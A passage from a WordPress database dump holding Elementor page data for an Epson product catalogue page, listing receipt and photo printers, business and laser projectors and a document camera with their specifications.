]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7996,3486,'_elementor_template_type','post'),(7994,3486,'_wp_page_template','template-fullwidth.php'),(7995,3486,'_elementor_edit_mode','builder'),(7998,3486,'_elementor_version','2.5.14'),(8001,3487,'_wp_page_template','template-fullwidth.php'),(8002,3487,'_elementor_edit_mode','builder'),(8003,3487,'_elementor_template_type','post'),(8004,3487,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct 